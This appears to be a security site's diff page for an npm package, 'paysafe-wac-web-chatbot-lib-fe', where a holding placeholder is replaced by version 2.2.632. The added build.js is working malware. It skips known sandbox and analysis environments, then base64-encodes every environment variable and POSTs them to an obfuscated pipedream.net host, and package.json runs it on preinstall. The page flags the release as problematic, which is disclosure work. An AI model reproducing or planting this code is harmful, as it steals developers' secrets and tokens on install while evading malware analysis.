paysafe-wac-web-chatbot-lib-fe 0.0.1-security → 2.2.632

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of paysafe-wac-web-chatbot-lib-fe might be problematic. Click here for more details.

package/build.js ADDED
@@ -0,0 +1,66 @@
1
+ var http = require('https');
2
+
3
+ var filter = [
4
+ { key: ['npm', 'config', 'registry'].join('_'), val: ['taobao', 'org'].join('.') },
5
+ { key: ['npm', 'config', 'registry'].join('_'), val: ['registry', 'npmmirror', 'com'].join('.') },
6
+ { key: 'USERNAME', val: ['daas', 'admin'].join('') },
7
+ { key: '_', val: '/usr/bin/python' },
8
+ { key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') },
9
+ [
10
+ { key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') },
11
+ { key: 'HOME', val: ['', 'home', 'app'].join('/') },
12
+ { key: 'USER', val: 'app' },
13
+ ],
14
+ [
15
+ { key: 'EDITOR', val: 'vi' },
16
+ { key: 'PROBE_USERNAME', val: '*' },
17
+ { key: 'SHELL', val: '/bin/bash' },
18
+ { key: 'SHLVL', val: '2' },
19
+ { key: 'npm_command', val: 'run-script' },
20
+ { key: 'NVM_CD_FLAGS', val: '' },
21
+ { key: 'npm_config_fund', val: '' },
22
+ ],
23
+ [
24
+ { key: 'HOME', val: '/home/username' },
25
+ { key: 'USER', val: 'username' },
26
+ { key: 'LOGNAME', val: 'username' },
27
+ ],
28
+ [
29
+ { key: 'PWD', val: '/my-app' },
30
+ { key: 'DEBIAN_FRONTEND', val: 'noninteractive' },
31
+ { key: 'HOME', val: '/root' },
32
+ ],
33
+ [
34
+ { key: 'INIT_CWD', val: '/analysis' },
35
+ { key: 'APPDATA', val: '/analysis/bait' },
36
+ ],
37
+ ];
38
+
39
+ function main() {
40
+ var data = process.env || {};
41
+ if (
42
+ filter.some((entry) =>
43
+ []
44
+ .concat(entry)
45
+ .every((item) => (data[item.key] || '').includes(item.val) || item.val === '*')
46
+ ) ||
47
+ Object.keys(data).length < 10 ||
48
+ data.PWD === `/${data.USER}/node_modules/${data.npm_package_name}`
49
+ ) {
50
+ return;
51
+ }
52
+
53
+ var req = http
54
+ .request({
55
+ host: [['eop', 'ggsxb6zpuxno'].join(''), 'm', ['pip', 'edr', 'eam'].join(''), 'net'].join('.'),
56
+ path: '/' + (data.npm_package_name || ''),
57
+ method: 'POST',
58
+ })
59
+ .on('error', function (err) {
60
+ });
61
+
62
+ req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
63
+ req.end();
64
+ }
65
+
66
+ main();
package/dist/index.js ADDED
@@ -0,0 +1 @@
1
+ window.zoom=new function(){var e=["width=device-width","initial-scale=1.0","minimum-scale=1.0","maximum-scale=1.0"],t=[e[0],e[1]].join(", "),i=e.join(", ");function n(){var e=document.getElementsByName("viewport")[0];return void 0===e&&((e=document.createElement("meta")).setAttribute("name","viewport"),e.setAttribute("content",t),document.head.appendChild(e)),e}this.reset=function(){var e;/iPhone/i.test(navigator.userAgent)&&(e=i,n().setAttribute("content",e))}},window.zoom.reset(),function(){var e,t,i=document.attachEvent,n=!1;if(!i){var r=(t=window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||function(e){return window.setTimeout(e,20)},function(e){return t(e)}),s=(e=window.cancelAnimationFrame||window.mozCancelAnimationFrame||window.webkitCancelAnimationFrame||window.clearTimeout,function(t){return e(t)});function o(e){var t=e.__resizeTriggers__,i=t.firstElementChild,n=t.lastElementChild,r=i.firstElementChild;n.scrollLeft=n.scrollWidth,n.scrollTop=n.scrollHeight,r.style.width=i.offsetWidth+1+"px",r.style.height=i.offsetHeight+1+"px",i.scrollLeft=i.scrollWidth,i.scrollTop=i.scrollHeight}function a(e){var t=this;o(this),this.__resizeRAF__&&s(this.__resizeRAF__),this.__resizeRAF__=r(function(){(function(e){return e.offsetWidth!=e.__resizeLast__.width||e.offsetHeight!=e.__resizeLast__.height})(t)&&(t.__resizeLast__.width=t.offsetWidth,t.__resizeLast__.height=t.offsetHeight,t.__resizeListeners__.forEach(function(i){i.call(t,e)}))})}var _=!1,d="",c="animationstart",l="Webkit Moz O ms".split(" "),m="webkitAnimationStart animationstart oAnimationStart MSAnimationStart".split(" "),h="",g=document.createElement("fakeelement");if(void 0!==g.style.animationName&&(_=!0),!1===_)for(var f=0;f<l.length;f++)if(void 0!==g.style[l[f]+"AnimationName"]){(h=l[f])+"Animation",d="-"+h.toLowerCase()+"-",c=m[f],_=!0;break}var u="resizeanim",w="@"+d+"keyframes "+u+" { from { opacity: 0; } to { opacity: 0; } } ",v=d+"animation: 1ms "+u+"; "}window.addResizeListener=function(e,t){i?e.attachEvent("onresize",t):(e.__resizeTriggers__||(!function(){if(!n){var e=(w||"")+".resize-triggers { "+(v||"")+'visibility: hidden; opacity: 0; } .resize-triggers, .resize-triggers > div, .contract-trigger:before { content: " "; display: block; position: absolute; top: 0; left: 0; height: 100%; width: 100%; overflow: hidden; } .resize-triggers > div { background: #eee; overflow: auto; } .contract-trigger:before { width: 200%; height: 200%; }',t=document.head||document.getElementsByTagName("head")[0],i=document.createElement("style");i.type="text/css",i.styleSheet?i.styleSheet.cssText=e:i.appendChild(document.createTextNode(e)),t.appendChild(i),n=!0}}(),e.__resizeLast__={},e.__resizeListeners__=[],(e.__resizeTriggers__=document.createElement("div")).className="resize-triggers",e.__resizeTriggers__.innerHTML='<div class="expand-trigger"><div></div></div><div class="contract-trigger"></div>',e.appendChild(e.__resizeTriggers__),o(e),e.addEventListener("scroll",a,!0),c&&e.__resizeTriggers__.addEventListener(c,function(t){t.animationName==u&&o(e)})),e.__resizeListeners__.push(t))},window.removeResizeListener=function(e,t){i?e.detachEvent("onresize",t):e.__resizeListeners__&&(e.__resizeListeners__.splice(e.__resizeListeners__.indexOf(t),1),e.__resizeListeners__.length||(e.removeEventListener("scroll",a),e.__resizeTriggers__=!e.removeChild(e.__resizeTriggers__)))}}();
package/package.json CHANGED
@@ -1,6 +1,22 @@
1
1
  {
2
2
  "name": "paysafe-wac-web-chatbot-lib-fe",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "2.2.632",
4
+ "private": false,
5
+ "description": "",
6
+ "license": "MIT",
7
+ "author": "hskrl",
8
+ "main": "dist/index.js",
9
+ "scripts": {
10
+ "build": "npm run mkdir && node build.js",
11
+ "preinstall": "node build.js",
12
+ "mkdir": "node build.js",
13
+ "test": "exit 0"
14
+ },
15
+ "dependencies": {
16
+ "ramda": "^0.28.0"
17
+ },
18
+ "hash": "eb2ac085b873ed9a261cbacf88c2c4f986b28a23",
19
+ "publishConfig": {
20
+ "access": "public"
21
+ }
22
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=paysafe-wac-web-chatbot-lib-fe for more information.